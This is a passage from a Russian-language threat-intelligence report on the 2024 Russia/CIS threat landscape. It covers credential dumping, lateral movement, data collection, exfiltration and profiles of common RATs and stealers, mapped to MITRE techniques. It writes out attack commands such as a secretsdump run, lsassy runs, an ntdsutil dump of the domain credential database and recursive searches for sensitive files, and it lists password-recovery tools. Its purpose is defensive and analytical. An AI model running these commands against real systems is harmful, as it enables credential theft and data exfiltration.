В подавляющем большинстве атак, злоумышленники используют утилиту mimikatz для получения

учетных данных скомпрометированных хостов. Например, маскируясь под имя калькулятора, чтобы
сдампить локальные учетные данные из памяти процесса [Link]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 50

.\[Link]

MD5 e930b05efe23891d19bc354a4209be3e

SHA1 d1f7832035c3e8a73cc78afd28cfd7f4cece6d20

SHA256 92804faaab2175dc501d73e814663058c78c0a042675a8937266357bcfb96c50

File type PE64 executable amd64, for MS Windows

File size 1.19 MB

File name [Link]

Различные пути, по которым был найден mimikatz при расследованиях атак:

C:\Users\<username>\Desktop\x64\[Link]
C:\Users\<username>\Desktop\CrackMapExecWin_v2.2\hosted\Invoke-Mimikatz.ps1
C:\[Redacted]\x64\[Link]
C:\Users\<username>\Pictures\mimikatz\x32\[Link]
C:\Users\<username>\Pictures\mimikatz\x32\[Link]
C:\Users\<username>\Pictures\mimikatz\x32\[Link]
C:\Users\<username>\Pictures\mimikatz\x32\[Link]
C:\Users\<username>\Pictures\mimikatz\x64\[Link]
C:\Users\<username>\Pictures\mimikatz\x64\[Link]
C:\Users\<username>\Pictures\mimikatz\x64\[Link]
C:\Users\<username>\Desktop\Новая папка\mimikatz\x32\[Link]
C:\Users\<username>\Desktop\Новая папка\mimikatz\x32\[Link]
C:\Users\<username>\Desktop\Новая папка\mimikatz\x32\[Link]
C:\Users\<username>\Desktop\Новая папка\mimikatz\x64\[Link]
C:\Users\<username>\Desktop\Новая папка\mimikatz\x64\[Link]
С:\Users\<username>\Desktop\[Link]
С:\Users\<username>\Desktop\[Link]

Примечательно, что в большинстве случаев утилита была найдена на рабочем столе.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 51

Помимо использования mimikatz, атакующие используют SecretsDump из набора Impacket

и общеизвестную утилиту lsassy, исходный код которой доступен на GitHub.

Подробнее

Пример использования утилиты secretsdump:

[Link] [redacted] -just-dc-ntlm -outputfile [Link]

Пример использования утилиты lsassy:

[Link] -u [redacted] -p [redacted] [target_ip]

[Link] -d [redacted] -u [redacted] -p [redacted] [target_ip]

Для получения доменных учетных данных, атакующие чаще всего дампят [Link] с помощью системной
утилиты [Link]:

$system32\[Link]",""$system32\[Link]" "ac i ntds" ifm "create full c:\temp" q q

Также мы обнаружили, что у атакующих пользуется популярностью набор утилит от NirSoft c помощью
которых можно получить различные пароли хранящиеся на системе.

Примеры утилит, найденных при расследовании атак, с их описанием:

[Link] Утилиты от NirSoft для восстановления паролей.

Подробнее
[Link] Утилита показывает пароли, хранящиеся за маркерами
в стандартном текстовом поле ввода пароля операционной
системы Windows и веб-браузере Internet Explorer

[Link] Утилита от NirSoft, которая позволяет просматривать

имена пользователей и пароли, хранящиеся в веб-браузере Подробнее
Google Chrome

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 52

[Link] Утилита от NirSoft для перечисления всех записей диал-ап/

Подробнее
VPN на компьютере и отображения данных для входа: имя
пользователя, пароль и домен

[Link] Утилита от NirSoft, которая позволяет извлекать пароли,

хранящиеся в веб-браузере Internet Explorer, а также Подробнее
Microsoft Edge

[Link] Утилита от NirSoft, которая позволяет извлекать пароли

Подробнее
и другие данные аккаунта из почтовых клиентов: Outlook
Express, Microsoft Outlook 2000 (только POP3 и SMTP),
Microsoft Outlook 2002/2003/2007/2010/2013/2016
(POP3, IMAP, HTTP и SMTP), Windows Mail, Windows Live
Mail, IncrediMail, Eudora, Netscape 6.x/7.x (если пароли не
зашифрованы мастер-паролем), Mozilla Thunderbird (если
пароли не зашифрованы мастер-паролем), Group Mail Free
Yahoo! Mail (если пароли сохранены в приложении in Yahoo!
Messenger), Hotmail/MSN mail (если пароли сохранены в
приложениях MSN/Windows/Live Messenger), Gmail (если
пароли сохранены в приложении Gmail Notifier, Google
Desktop или by Google Talk)

[Link] Утилита от NirSoft, которая позволяет восстановить все

Подробнее
[Link] сетевые пароли, хранящиеся в системе для текущего
вошедшего в систему пользователя

[Link] Утилита от NirSoft, которая позволяет восстанавливать

пароли веб-браузера Opera (расшифровывает содержимое Подробнее
файла паролей [Link] и отображает список всех паролей
от веб-сайтов, хранящихся в этом файле)

[Link] Утилита от NirSoft, которая позволяет восстанавливать

Подробнее
[Link] имена пользователей и пароли, хранящиеся в веб-браузере
Mozilla Firefox

[Link] Утилита от NirSoft, которая позволяет восстанавливать

пароли, хранящиеся в Internet Explorer, Outlook Express Подробнее
и MSN Explorer. Пароли извлекаются из защищенного
хранилища

[Link] Утилита от NirSoft, которая позволяет восстанавливать

Подробнее
пароли от файлов Outlook .PST

[Link] Утилита от NirSoft, которая позволяет восстанавливать

Подробнее
пароли, хранимые утилитой Microsoft Remote Desktop
Connection в файлах с расширением .rdp. В современных
версиях Remote Desktop Connection утилита не работает

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 53

[Link] Утилита от NirSoft, которая позволяет восстанавливать

Подробнее
различные данные из конфигурационных фалов роутеров
(имена пользователей/пароли ISP, логины/пароли роутеров
и др.)

[Link] Утилита от NirSoft для перехвата паролей, проходящих Подробнее

[Link] через сетевой адаптер. SniffPass может перехватывать
пароли следующих протоколов: POP3, IMAP4, SMTP, FTP
и HTTP

[Link] Утилита от NirSoft, которая позволяет восстанавливать Подробнее

пароли, хранящиеся в утилитах VNC

[Link] Утилита от NirSoft, которая позволяет восстанавливать

пароли из веб-браузеров Internet Explorer (версии 4.0 - 11.0), Подробнее
Mozilla Firefox (все версии), Google Chrome, Safari и Opera

[Link] Утилита от NirSoft, которая позволяет восстанавливать

Подробнее
[Link] ключи и пароли (WEP/WPA) беспроводной сети, хранимые
сервисом «Wireless Zero Configuration» в Windows XP и
«WLAN AutoConfig» в Windows Vista, Windows 7, Windows 8,
Windows 10 и Windows Server 2008

Lateral Movement

Одним из основных методов, является использование протокола удаленного рабочего стола

(RDP) через различные клиенты удаленного администрирования (AnyDesk, Radmin, Teamviewer
и другие) для подключения к другим компьютерам в сети жертвы. Также пользуется популярностью
использование PsExec, причем как легитимного из пакета SysInternals, так и Impacket версии, для
перемещения по сети с помощью протокола SMB.

То же самое касается использования WMI, злоумышленники активно пользуются им как в легитимном

варианте, через [Link], так и через wmiexec.

Набирать популярность стало использование командлета Enter-PSSession для установления

интерактивного сеанса с удаленными компьютерами в сети. Эти команды являются частью
возможностей PowerShell по удаленному управлению и выполнению команд в удаленных системах
с помощью PowerShell Remoting.

Enter-PSSession -ComputerName [COMPUTER 1]

Enter-PSSession -ComputerName [COMPUTER 2]
Enter-PSSession -ComputerName [COMPUTER 3]

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 54

Out
Фаза «Out» в контексте Unified Cyber Kill Chain описывает заключительные действия злоумышленника
после успешного проникновения в целевую сеть и расширения его доступа к необходимым
системам и данным. На этом этапе основное внимание уделяется достижению конечных целей атаки,
которые могут включать кражу данных, саботаж или другие действия, которые ставят под угрозу
конфиденциальность, целостность и доступность (CIA) информационных активов жертвы.

Collection

Злоумышленники собирают конфиденциальную информацию от своих жертв: финансовые документы,

записи компаний, чертежи, корпоративную переписку и т. д.

В подавляющем большинстве случаев, атакующие используют утилиту 7z для архивации данных, а для
их поиска системную утилиту [Link] или командлеты powershell.

Примеры среднестатистических wildcard поисков чувствительной информации:

findstr /S /I /R [PATTERN] *.doc *.docx *.xls *.xlsx *.ppt *.pptx *.pdf *.eml *.msg *.pst *.mbox *.csv *.qbw
*.qba *.qfx *.txt *.rtf *.xml *.json *.conf *.cfg *.ini *.db *.sql *.mdb *.log > C:\[Link]

Get-ChildItem -Path C:\ -Recurse -Include *.doc, *.docx, *.xls, *.xlsx, *.ppt, *.pptx, *.pdf, *.eml, *.msg, *.pst,
*.mbox, *.csv, *.qbw, *.qba, *.qfx, *.txt, *.rtf, *.xml, *.json, *.conf, *.cfg, *.ini, *.db, *.sql, *.mdb, *.log |
Select-String -Pattern "[PATTERN]"
-CaseSensitive:$false |
Select Path, LineNumber, Line |
Out-File -FilePath C:\sensitive_data_results.txt

Одним из трендов, который мы хотим отметить, стало похищение аккаунтов в телеграм путем
архивации и последующей эксфильтрации пользовательской папки мессенджера:

C:\Users\[User]\AppData\Roaming\Telegram Desktop\tdata\tdata.7z

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 55

В эту папку входят кэшированные медиафайлы (изображения, видео, аудио), сообщения, стикеры
и документы, которые пользователь отправлял или получал через Telegram. Эти данные можно
использовать для быстрого доступа без необходимости повторной загрузки с серверов. Она также
содержит информацию, необходимую для поддержания активности сеанса пользователя, что
позволяет приложению автоматически подключаться к учетной записи без повторного ввода имени
пользователя и пароля. Ключи шифрования используются для обеспечения безопасности данных,
хранящихся локально. Сеансовые файлы и ключи шифрования можно использовать для доступа
к учетной записи Telegram жертвы без необходимости авторизации, что позволяет злоумышленнику
читать и отправлять сообщения от вашего имени.

Exfiltration

В основном атакующие пользуются облачными файлообменниками для эксфильтрации

чувствительной информации своих жертв посредством использования легитимных приложений
браузеров и применения функции drag-and-drop для скрытия своих действий от систем защиты.

Основные сервисы:

• mega
• dropmefiles
• [Link]

Также достаточно популярным способом является использование легитимных FTP клиентов таких как
FileZilla FTP Client, для выгрузки данных на FTP сервера атакующих.

Impact

Этап «Impact» (Воздействие) в контексте Unified Kill Chain описывает непосредственное влияние
кибератаки на целевую организацию или систему. Это включает в себя все виды деструктивной
деятельности, которая может быть направлена на уничтожение, изменение или манипулирование
данными и ресурсами. Злоумышленники шифруют данные с помощью версии популярного
шифровальщика LockBit 3.0, скомпилированного из исходного кода, который находится в открытом
доступе.

Не финансово мотивированные группировки, еще и уничтожают инфраструктуру с помощью вайперов.

А самым популярным майнером, который устанавливают злоумышленники, является xmrig для

«добычи» MONERO.

Objectives

Этап «Objectives» (Цели) в Unified Kill Chain описывает первичные стратегические цели
злоумышленников, которые они стремятся достичь при атаках на информационные системы.

В контексте злоумышленников, нацеленных на регион Россия и страны СНГ, можно выделить две
основные категории стратегических целей: финансовые и политические.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе инцидентов Содержание 56

Финансовые цели:

• Использование ransomware (вымогательского ПО) для блокировки доступа к важным данным или
системам с целью получения выкупа.
• Кража персональных данных клиентов компаний с целью последующей перепродажи или
использование в дальнейщих фрод схемах.

Политические цели:

• Шпионаж — сбор разведданных со стратегических и государственных предприятий.

• Влияние на политические процессы — атаки могут быть направлены на изменение политической
повестки или манипулирование общественным мнением, например, через взломы медиа-ресурсов
или социальных сетей.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 57

Статистика на основе анализа ВПО в KTAE

По данным нашего продукта Kaspersky Threat Attribution Engine (KTAE)9 мы составили список наиболее
встречающихся семейств вредоносов в регионе RU + CIS. Было выявлено, что сэмплы относятся,
в основном, к классам RAT и Stealer.

RAT’ники представляют собой один из самых опасных типов вредоносных программ, поскольку
они предоставляют злоумышленникам, как понятно из названия, удаленный доступ к зараженному
устройству. В исследуемом регионе были замечены следующие представители класса RAT:

• njRAT
• SparkRAT
• Dark Crystal RAT
• Orcus RAT
• DCRat
• Nanocore RAT
• AveMariaRAT
• Quasar RAT
• Revenge RAT
• Remcos
• Telemiris
• NetWire
• ToxicEyeRAT

Stealer — это зловред, который ворует различные чувствительные данные с хоста жертвы, будь то
данные учетных записей, банковских карт или файлы.

В исследуемом регионе были замечены следующие представители этого класса:

• Azorult
• RedLine
• RaccoonStealer
• Rhadamanthys
• OskiStealer
• Stealerium
• Formbook
• MATA

9 KTAE

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 58

Перед тем, как подробнее рассказать про наиболее популярные зловреды в регионе, предлагаем
ознакомиться с ТОП-24 TTPs используемых данными зловредами:

График 6 Распределение по популярным TTPs, используемых ВПО

Количество
Scheduled Task/Job: Scheduled Task (T1053.005) 38,95%
ВПО
Windows Management Instrumentation (T1047) 20,49%

Credentials from Password Stores: Credentials from Web Browsers (T1555.003) 4,97%

Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001) 4,14%

Exploitation for Client Execution (T1203) 3,86%

Impair Defenses: Disable or Modify Tools (T1562.001) 3,59%

Indicator Removal on Host: Timestomp (T1070.006) 3,45%

Process Injection: Thread Execution Hijacking (T1055.003) 3,29%

Masquerading: Match Legitimate Name or Location (T1036.005) 2,40%

Access Token Manipulation: Make and Impersonate Token (T1134.003) 1,83%

User Execution: Malicious File (T1204.002) 1,75%

Process Injection: Process Hollowing (T1055.012) 1,62%

Boot or Logon Autostart Execution: Winlogon Helper DLL (T1547.004) 1,48%

Indicator Removal: File Deletion (T1070.004) 1,48%

Modify Registry (T1112) 1,28%

Input Capture: Keylogging: Keylogging (T1056.001) 0,79%

File and Directory Discovery (T1083) 0,75%

Access Token Manipulation (T1134) 0,68%

Process Injection: Portable Executable Injection (T1055.002) 0,62%

Credentials from Password Stores (T1555) 0,62%

Data from Local System (T1005) 0,58%

Hide Artifacts: Hidden Files and Directories (T1564.001) 0,51%

System Information Discovery (T1082) 0,38%

Abuse Elevation Control Mechanism: Bypass User Account Control (T1548.002) 0,38%

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 59

Из данной статистики можно увидеть, что преобладающими техниками являются создание

запланированных задач (Scheduled Task/Job: Scheduled Task (T1053.005)) и использование Windows
Management Instrumentation (Windows Management Instrumentation (T1047)). То есть картина выглядит
следующим, довольно предсказуемым, образом - большинство зловредов предпочитают закрепляться
в зараженных системах за счет запланированных задач и выполнять различные действия с помощью
WMI-запросов.

Ну и так как большинство обнаруженных в регионе зловредов, в основном, относятся к семействам

RAT`ников и стиллеров, то и в статистике встречается множество релевантных техник:

• Credentials from Password Stores: Credentials from Web Browsers (T1555.003)

• Masquerading: Match Legitimate Name or Location (T1036.005)
• Input Capture: Keylogging: Keylogging (T1056.001)
• Credentials from Password Stores (T1555)
• Data from Local System (T1005)
• System Information Discovery (T1082)

Поэтому следует уделить особое внимание покрытию данных техник детектирующей логикой в своей
инфраструктуре. Идеи для детектирования указанных выше техник можно получить из нашего Sigma
Rules Data Feed. В нем поставляется множество различной детектирующей логики в формате Sigma,
которая была протестирована на телеметрии Лаборатории Касперского. И благодаря которой можно
значительно расширить покрытие недостающих техник MITRE.

Далее, предлагаем повнимательнее рассмотреть самые популярные зловреды, которые были

замечены в рассматриваемом регионе.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 60

njRAT
Троянская программа для удаленного доступа, также известна под названием Bladabindi. Была впервые
обнаружена в 2012 году. Позволяет злоумышленнику управлять зараженным хостом, собирать и красть
различные данные.

Основным способом распространения являются фишинговые атаки. Также встречались кейсы, когда
njRAT доставлялся совместно с другим ВПО на более поздних этапах атаки.

Обладает следующими ключевыми функциями:

• Управление файлами
• Выполнение команд в удаленной командной оболочке
• Управление процессами и службами
• Изменение реестра
• Запись с веб-камеры и микрофона
• Запись нажатий клавиш (кейлоггер)
• Удаленное управление рабочим столом
• Кража паролей из браузеров
• Кража данных из криптовалютных кошельков

Решение Лаборатории Касперского — Kaspersky Threat Attribution Engine, позволяет выполнить

атрибуцию образцов njRAT с высокой вероятностью, а также найти схожие образцы ВПО как показано
на скриншоте ниже.

Рисунок 3 Анализ njRAT в KTAE

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 61

ТОП-TTPs на основе анализа:

• T1134.003 Access Token Manipulation: Make and Impersonate Token10

• T1112 Modify Registry
• T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1053.005 Scheduled Task/Job: Scheduled Task
• T1036.005 Masquerading: Match Legitimate Name or Location
• T1055.002 Process Injection: Portable Executable Injection
• T1562.001 Impair Defenses: Disable or Modify Tools
• T1562.004 Impair Defenses: Disable or Modify System Firewall
• T1091 Replication Through Removable Media
• T1119 Automated Collection
• T1070.004 Indicator Removal: File Deletion

ToxicEyeRAT
Многофункциональный RAT, обладающий функционалом стиллера, и управляемый посредством бота
в Telegram.

Распространяется обычно через фишинговые вложения и после запуска пытается собрать следующие
данные:

• Криптовалютные кошельки.
• Информация о компьютере и системе.
• Данные браузера.
• Установленное программное обеспечение и процессы.
• Файлы рабочего стола.
• Снимок экрана рабочего стола.
• Файлы Steam.
• Данные Discord и Telegram.
• Файлы FileZilla.

Также в нем есть возможность делать скриншоты рабочего стола.

ТОП-TTPs на основе анализа:

• MITRE: T1033 System Owner/User Discovery

• MITRE: T1053 Scheduled Task/Job
• MITRE: T1070.004 Indicator Removal: File Deletion
• MITRE: T1083 File and Directory Discovery
• MITRE: T1134 Access Token Manipulation

10 Подробнее можно узнать в разделе Access Token Manipulation T1134

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 62

DCRat
Также известный как Dark Crystal RAT, впервые был обнаружен в 2018 году. Является модульным ВПО,
за счет чего может выполнять множество различных задач. Например, кражи паролей, информации
с криптокошельков или учетных данных из Telegram, Steam, Discord, а также удаленного управления.

В основном, распространяется через фишинговые рассылки с вредоносным вложением или под видом
стороннего ПО, например WinRAR.

Обладает следующими ключевыми функциями:

• Сбор информации с хоста жертвы, такой как пароли, личные файлы, информация о системе, нажатия
клавиш (кейлоггер).
• Удаленное управление зараженным хостом, которое позволяет получить доступ к рабочему столу,
клавиатуре и мыши.
• Автоматическое выполнение задач после заражения, например, скачивание дополнительных файлов,
отключение UAC или Windows Defender, создание запланированной задачи.

Еще один пример поиска похожих образцов ВПО, на этот раз с использование технологии Similarity,
которая доступна на нашем Kaspersky Threat Intelligence Portal.

Рисунок 4 Анализ DCRat с помощью технологии Similarity

ТОП-TTPs на основе анализа:

• T1053.005 Scheduled Task/Job: Scheduled Task

• T1047 Windows Management Instrumentation
• T1562.001 Impair Defenses: Disable or Modify Tools
• T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1036.005 Masquerading: Match Legitimate Name or Location
• T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
• T1070.006 Indicator Removal on Host: Timestomp
• T1112 Modify Registry
• T1083 File and Directory Discovery
• T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 63

Royal Ransomware
ВПО для шифрования данных, впервые обнаруженное в 2022 году, изначально было известно под
названием Zeon. Имеет версии как для ОС Windows, так и Linux.

Известно несколько вариантов распространения данного шифровальщика. В одном используются

стандартные фишинговые письма, а во втором случае эксплуатируются различные уязвимости
обнаруженные в сервисах находящихся на внешнем периметре.

В атаках с использованием Royal Ransomware используется техника вымогательства Double-Extortion,

в рамках которой, злоумышленники не только шифруют данные жертвы, но и выкачивают их на свои
сервера с целью дальнейшей публикации или продажи.

Обладает следующими ключевыми функциями:

• Шифрование файлов только на текущей зараженной системе (флаг -localonly) или шифрование
файлов на сетевых дисках без шифрования локальной системы (флаг -networkonly).
• Шифрование определенных файлов и/или директорий при явном указании флага -path.
• Обязательным флагом для запуска является -id в котором указывается 32 значный ID присвоенный
жертве.

ТОП-TTPs на основе анализа:

• T1204.002 User Execution: Malicious File

• T1059.003 Command and Scripting Interpreter: Windows Command Shell
• T1083 File and Directory Discovery
• T1486 Data Encrypted for Impact
• T1490 Inhibit System Recovery
• T1218.010 System Binary Proxy Execution: Regsvr32
• T1102 Web Service

Stealerium
Данный стиллер впервые был обнаружен в 2022 году. Интересной особенностью данного стиллера
является то, что всю украденную информацию он отправляет в предварительно указанный в билдере
Discord-канал злоумышленника.

Известные методы распространения: в основном это вредоносные вложения в фишинговых письмах,

но известны случаи скачивания данного ВПО через онлайн-рекламу на различных сайтах.

Обладает следующими ключевыми функциями:

• Сбор информации о системе, такой как версия ОС, CPU, GPU, RAM, SSID, BSSID, IP-адрес,
местоположение, разрешение экрана и установленные приложения.
• Сбор данных из браузеров на базе Chromium и Gecko, такой как сохраненные пароли, кредитные
карты, куки, история, закладки, файлы баз данных.
• Кража файлов с зараженного хоста.
• Установка кейлоггера.
• Скриншоты рабочего стола.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 64

На скриншоте ниже представлен пример детонации образца в Sandbox, в котором видно что стиллер
пытается получить данные из браузера Google Chrome:

Рисунок 5 Детонация стиллера Stealerium

ТОП-TTPs на основе анализа:

• T1555.003 Credentials from Password Stores: Credentials from Web Browsers

• T1217 Browser Information Discovery
• T1003.001 OS Credential Dumping: LSASS Memory

Orcus RAT
Ранее известный как Schnorchel, впервые был обнаружен в 2016 году. Позволяет злоумышленникам
управлять зараженными системами.

Распространяется, в основном, с помощью фишинговых писем с вредоносным вложением.

Рассматриваемое ВПО обладает стандартными для RAT возможностями, создание скриншотов,

удаленное управление рабочим столом, редактирование реестра, кейлоггер и т.д. Поэтому стоит
отметить несколько особенностей:

• Возможность создания кастомных плагинов, что позволяет злоумышленникам самостоятельно

добавлять необходимый функционал.
• Возможность создание служб в зараженной системе.
• Сбор журналов событий Windows.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 65

ТОП-TTPs на основе анализа:

• T1053.005 Scheduled Task/Job: Scheduled Task

• T1082 System Information Discovery
• T1112 Modify Registry
• T1543.003 Create or Modify System Process: Windows Service
• T1036 Masquerading
• T1055.002 Process Injection: Portable Executable Injection
• T1036.004 Masquerading: Masquerade Task or Service
• T1518.001 Software Discovery: Security Software Discovery
• T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1555 Credentials from Password Stores

Formbook
Данный троян предназначен для кражи информации и удаленного управления зараженными
устройствами. Она широко используется киберпреступниками в регионе РФ и СНГ, представляя
значительную угрозу для частных лиц и организаций. Распространяется через фишинговые атаки либо
эксплуатацию уязвимостей.

Основными характеристиками являются:

• Широкий спектр функций, присущий ВПО такого класса: управление зараженным устройством,
кража конфиденциальных данных, создание снимков экрана, запись нажатия клавиш, скачивание
и загрузка файлов на зараженный хост, установка сторонних программ.
• Использует различные методы для сокрытия своего присутствия на зараженных устройствах.
• Имеет модульную архитектуру, позволяя злоумышленникам добавлять новые функции
и возможности.

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 66

На скриншоте ниже представлена детонация образца стиллера Formbook в Sandbox Kaspersky:

Рисунок 6 Детонация стиллера Formbook

ТОП-TTPs на основе анализа:

• T1005 Data from Local System

• T1036 Masquerading
• T1053 Scheduled Task/Job
• T1056 Input Capture
• T1059 Command and Scripting Interpreter
• T1070 Indicator Removal
• T1083 File and Directory Discovery
• T1129 Shared Modules
• T1203 Exploitation for Client Execution
• T1204 User Execution
• T1218 System Binary Proxy Execution
• T1547 Boot or Logon Autostart Execution
• T1555 Credentials from Password Stores
• T1562 Impair Defenses
• T1564 Hide Artifacts

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 67

MATA
Мультиплатформенный вредоносный инструмент. Этот фреймворк был замечен в атаках с целью краж
баз данных компаний и заражения корпоративных сетей троянцами-шифровальщиками. Он состоит
из программы-загрузчика, программы для управления процессами после заражения устройства
и плагинов. По своим возможностям напоминает швейцарский нож, предоставляя злоумышленникам
широкий спектр инструментов для достижения своих целей. Более подробно можно почитать
на SecureList11.

Функциональность MATA включает:

• Управление процессами на скомпрометированном хосте.

• Загрузку и развертывание других вредоносных программ.
• Инжект кода в другие процессы.
• Сбор информации с хоста жертвы (отслеживание буфера обмена, нажатия клавиш).
• Создание скриншотов.

Особо стоит отметить техники, которые злоумышленники использовали для латерального

перемещения и доставки вредоносного ПО в защищенные (то есть изолированные от интернета)
сегменты сетей целевых организаций. Функциональность MATA включает в себя возможности
построения многоуровневых цепочек прокси-серверов и передачи трафика от одной взломанной
системы к другой или от взломанной системы к командно-контрольному серверу вредоносного ПО
и обратно.

ТОП-TTPs на основе анализа:

• T1033 System Owner/User Discovery

• T1036.004 Masquerading: Masquerade Task or Service
• T1053.005 Scheduled Task/Job: Scheduled Task
• T1055.002 Process Injection: Portable Executable Injection
• T1055.012 Process Injection: Process Hollowing
• T1056.001 Input Capture: Keylogging
• T1070.004 Indicator Removal: File Deletion
• T1115 Clipboard Data
• T1134 Access Token Manipulation
• T1218.010 System Binary Proxy Execution: Regsvr32
• T1543.003 Create or Modify System Process: Windows Service
• T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
• T1564.001 Hide Artifacts: Hidden Files and Directories

11 MATA Подробнее

11 Updated MATA Подробнее

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 68

Redline
Этот стилер зачастую распространяется по модели MaaS (Malware-as-a-Service). Известен с начала
2020 года и развивается на протяжении многих лет.

Доставка на зараженный хост происходит обычно с помощью фишинговых вложений, но в 2022 году
была замечена кампания по доставке этого вредоноса, используя фейковые обновления Windows 11.

Основные возможности не отличаются от других представителей этого класса:

• Сбор информации из браузера.

• Перехват нажатия клавиш на клавиатуре.
• Инвентаризация системы (имя пользователя, данные о местоположении, сведения о процессах и пр.).

В более поздних версиях RedLine добавлена возможность кражи криптовалюты. Вредоносная

программа также способна загружать и скачивать файлы с зараженного хоста, периодически
отправлять собранную с него информацию и выполнять другие команды от С2.

На скриншоте ниже представлена информация об образце стиллера Redline из сервиса Kaspersky

Threat Attribution Engine. Как мы можем видеть, наше решение проанализировало данный ей образец
на наличие схожести с остальными образцами из базы Kaspersky Security Network, определило что
это однозначно Redline, который частично пересекается с Agent Tesla и имеет множество похожих
образцов, которые мы также детектируем с помощью своих решений.

Рисунок 7 Анализ образца в сервисе KTAE

Ландшафт угроз для России и СНГ 2024

Перечень тактик, техник и процедур (TTPs) | Статистика на основе анализа ВПО в KTAE Содержание 69

ТОП-TTPs на основе анализа:

• T1005 Data from Local System

• T1053 Scheduled Task/Job
• T1055 Process Injection
• T1070.004 Indicator Removal: File Deletion
• T1082 System Information Discovery
• T1115 Clipboard Data
• T1134 Access Token Manipulation
• T1203 Exploitation for Client Execution
• T1204 User Execution
• T1518 Software Discovery
• T1555 Credentials from Password Stores
• T1562 Impair Defenses
• T1564 Hide Artifacts

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе Содержание 70

Перечень потенциальных угроз в регионе

В части сопутствующих угроз ситуация в исследуемом регионе аналогична мировым трендам и несет
риски как для частных лиц, так и для организаций от малого до крупного бизнеса.

Шифровальщики продолжают находиться в списке актуальных угроз со своими разрушительными

последствиями для инфраструктуры.

Утечки данных в даркнет также представляют серьезную проблему. Украденные конфиденциальные

сведения, такие как персональные данные, финансовая информация и коммерческие секреты, могут
быть использованы для различных мошеннических целей, нанося значительный ущерб как физическим,
так и юридическим лицам.

Фишинговые атаки — это неизменная классика которая остается одним из самых распространенных
методов киберпреступности. Злоумышленники рассылают письма или SMS-сообщения, имитирующие
сообщения от известных организаций, чтобы побудить пользователей перейти по вредоносным
ссылкам или предоставить конфиденциальную информацию.

Эксплуатация уязвимостей в программном обеспечении и системах аналогично остается актуальной

угрозой. Злоумышленники постоянно ищут новые бреши, чтобы получить доступ к конфиденциальной
информации или нарушить работу систем. Примечательно, что, судя по собранной статистике,
пользователи не спешат защищаться даже от давно известных уязвимостей.

Далее остановимся немного подробнее на каждом из пунктов.

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Атаки шифровальщиков Содержание 71

Атаки шифровальщиков
В 2024 году угроза шифровальщиков остается одной из самых актуальных для информационной
безопасности. Существует несколько причин, по которым шифровальщики по-прежнему представляют
серьезную опасность:

• Число атак остается на прежнем высоком уровне по сравнению с прошлыми периодами.

• Увеличение совокупной стоимости размеров выкупов. В 2023 году общий объём вырученной
прибыли составил более $1 млрд. Некоторые организации были вынуждены платить выкупы
в размере десятков миллионов долларов.
• Сложность дешифровки: злоумышленники как и раньше чаще всего используют проверенные
комбинации криптостойких алгоритмов шифрования: AES + RSA или ChaCha/Salsa + X25519.

Рейтинг стран в исследуемом регионе, расположенных по количеству уникальных пользователей KSN,

столкнувшихся с угрозой программ-вымогателей в первом квартале периода 2024, представлена ниже:

1 Таджикистан

2 Туркменистан

3 Казахстан

4 Узбекистан

5 Беларусь

6 Кыргызстан

7 Россия

8 Азербайджан

9 Армения

Ландшафт угроз для России и СНГ 2024

Перечень потенциальных угроз в регионе | Атаки шифровальщиков Содержание 72

Топ именных, т.е. соответствующих конкретному семейству шифровальщиков, вердиктов (по

количеству уникальных пользователей KSN):

№ 2022 Q1 2023 Q1 2024 Q1

1 [Link] [Link] [Link]

2 [Link] [Link] [Link]

3 [Link] [Link] [Link]

4 [Link] [Link] [Link]

Trojan-Ransom.Win32.
5 [Link] [Link]
PolyRansom

Если оценивать распространенность такой угрозы как шифровальщики в контексте всех стран
и регионов, то, согласно нашим данным, итоговый список выглядит вот так:

График 7 Тенденция распространения

по регионам

APAC
1,40
1

1,20
2 NA
1,00
3 META
0,80

4 EU
0,60

5 CIS
0,40

